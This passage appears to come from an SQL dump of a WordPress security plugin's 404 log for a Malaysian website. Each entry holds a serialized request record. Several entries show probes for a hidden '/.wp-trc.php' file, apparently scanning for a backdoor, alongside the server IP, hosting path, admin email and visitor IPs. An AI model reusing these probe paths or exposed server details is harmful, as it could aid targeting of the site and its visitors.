14:25:23',35156560,36968368,'https://bintara.com.my/.wp-trc.php',1,0,'89.19.30.65'),(27312,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/.wp-trc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"72-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"72-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"72-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZC@zDsTMh8XWj0I-HapnwAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC@zDsTMh8XWj0I-HapnwAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"89.19.30.65\";s:11:\"REMOTE_PORT\";s:5:\"54212\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:10:\"SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC@zDsTMh8XWj0I-HapnwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569767116.1725\";s:12:\"REQUEST_TIME\";s:10:\"1569767116\";}}','notice','2019-09-29 14:25:19','2019-09-29 14:25:16',35551008,37356992,'https://bintara.com.my/.wp-trc.php',1,0,'89.19.30.65'),(27311,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/.wp-trc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"196-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"196-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"196-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZC@s3upQ8972QULTgzOEgAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC@s3upQ8972QULTgzOEgAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"89.19.30.65\";s:11:\"REMOTE_PORT\";s:5:\"52978\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/.wp-trc.php\";s:10:\"SCRIPT_URL\";s:12:\"/.wp-trc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC@s3upQ8972QULTgzOEgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569767091.5509\";s:12:\"REQUEST_TIME\";s:10:\"1569767091\";}}','notice','2019-09-29 14:24:53','2019-09-29 14:24:51',35160048,36965048,'https://bintara.com.my/.wp-trc.php',1,0,'89.19.30.65'),(27310,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/toughpad-fz-m1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-m1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/toughpad-fz-m1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC9zI@6RYMKETn@EuqxUwAAAZE\";s:12:\"REDIRECT_URL\";s:16:\"/toughpad-fz-m1/\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.150.92\";s:11:\"REMOTE_PORT\";s:5:\"24006\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-m1/\";s:10:\"SCRIPT_URL\";s:16:\"/toughpad-fz-m1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC9zI@6RYMKETn@EuqxUwAAAZE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569766860.3772\";s:12:\"REQUEST_TIME\";s:10:\"1569766860\";}}','notice','2019-09-29 14:21:03','2019-09-29 14:21:00',35532224,37330992,'https://bintara.com.my/toughpad-fz-m1/',1,0,'54.36.150.92'),(27309,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4882.400 QQBrowser/9.7.13076.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.190.45.152\";s:11:\"REMOTE_PORT\";s:5:\"20824\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC60jsTMh8XWj0I-HanJAAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569766098.1339\";s:12:\"REQUEST_TIME\";s:10:\"1569766098\";}}','notice','2019-09-29 14:08:20','2019-09-29 14:08:18',35136240,36942376,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'46.190.45.152'),(27308,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"438CD032-7B48-4841-9106-F4A3E4A35732\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC504@6RYMKETn@EuqwfwAAAYc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"118.101.166.9\";s:11:\"REMOTE_PORT\";s:5:\"50772\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC504@6RYMKETn@EuqwfwAAAYc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569765843.5036\";s:12:\"REQUEST_TIME\";s:10:\"1569765843\";}}','notice','2019-09-29 14:04:06','2019-09-29 14:04:04',35500008,37303056,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'118.101.166.9'),(27307,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"BFFC0A2D-F6E6-41DE-9AC2-3F0DB60296BE\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC4hTsTMh8XWj0I-HalpgAAAEo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"118.101.166.9\";s:11:\"REMOTE_PORT\";s:5:\"50649\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC4hTsTMh8XWj0I-HalpgAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569765509.6131\";s:12:\"REQUEST_TIME\";s:10:\"1569765509\";}}','notice','2019-09-29 13:58:33','2019-09-29 13:58:30',35994464,37800200,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'118.101.166.9'),(27306,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/blog/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"http://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC0fzsTMh8XWj0I-HaimgAAAFg\";s:12:\"REDIRECT_URL\";s:6:\"/blog/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"55278\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"http://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC0fzsTMh8XWj0I-HaimgAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569764480.0589\";s:12:\"REQUEST_TIME\";s:10:\"1569764480\";}}','notice','2019-09-29 13:41:22','2019-09-29 13:41:20',35128088,36928536,'http://bintara.com.my/blog/',1,0,'45.93.20.4'),(27305,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/wordpress/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/wordpress/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC0fDsTMh8XWj0I-HailwAAAFE\";s:12:\"REDIRECT_URL\";s:11:\"/wordpress/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"55278\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/wordpress/\";s:10:\"SCRIPT_URL\";s:11:\"/wordpress/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC0fDsTMh8XWj0I-HailwAAAFE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569764476.2782\";s:12:\"REQUEST_TIME\";s:10:\"1569764476\";}}','notice','